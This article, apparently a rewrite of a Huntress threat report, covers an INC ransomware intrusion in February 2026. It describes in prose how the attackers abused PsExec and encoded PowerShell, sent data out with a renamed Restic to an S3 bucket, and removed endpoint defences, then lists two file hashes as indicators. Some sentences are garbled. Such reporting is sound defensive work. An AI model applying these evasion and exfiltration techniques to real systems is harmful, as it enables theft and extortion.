Recently, Huntress's cybersecurity researchers saw threat actors using INC ransomware after a complicated process of stealing data This article explores happening ransomware infrastructure. . On February 25, 2026, attackers broke into a customer's system, stole private information, and then locked down the network.
The attackers used built-in Windows tools like PowerShell and PsExec to plan the attack, get higher access rights, and get around systems that could have detected the attack early. The attackers were able to go undetected in the early stages because the organization they were targeting didn't have all of its security agents in place and didn't have a Security Information and Event Management (SIEM) system. Data Exfiltration and Evasion Tactics The attack sequence started on February 24 when the threat actor got into the target endpoint and mapped a network share. They quickly ran the Microsoft tool PsExec to give themselves more control over their system.
After that, the attackers set up a scheduled task called "Recovery Diagnostics" that would run a malicious script. This task ran a base64-encoded PowerShell command that set up environmental variables for a cloud storage bucket. The attackers used a renamed version of the open-source backup tool Restic, which they made look like winupdate.exe so it would blend in with other system processes.
The script led to an S3 bucket that Wasabi hosted. It had hardcoded credentials, and the password was just the word "password." A follow-up command told the disguised Restic tool to back up certain files that were listed in a text file. This effectively sent the data to the attacker's cloud infrastructure.
The attackers carefully took apart the endpoint's security defenses to get ready for the final ransomware attack.
They ran an executable on February 25 to uninstall the VIPRE Business Agent, and the regular uninstaller worked to remove it. They also turned off Real-Time Protection, which turned off Windows Defender. The threat actor launched the INC ransomware executable, which was disguised as win.exe, after removing the security controls from the environment.
It used the Windows RestartManager API to lock and encrypt files. Signs of Attack and Incident Overlap This kind of attack isn't new; Huntress analysts saw something very similar happen on February 9 of this month. The same hackers used matching base64-encoded PowerShell commands to push a Restic configuration for stealing data during that attack. The keys for accessing cloud storage and the environment variables were the same in both attacks.
In the first attack, the attackers used a program called HRSword to turn off Acronis's security services. But quick action stopped the deployment of the ransomware. On January 22, 2026, the Cyber Centaurs team reported activity that was very similar to what was happening with the INC ransomware infrastructure.
This pattern was further confirmed. This threat group uses a standard playbook that includes consistently using renamed backup tools, hardcoded cloud credentials, and targeted removal of security tools. Companies are advised to keep an eye on their surroundings for these signs of compromise linked to the INC ransomware campaign: What the Indicator Means The SHA256 hash for C:\123\edr.exe is 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d. The SHA256 hash for c:\perflogs\win.exe is e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13.
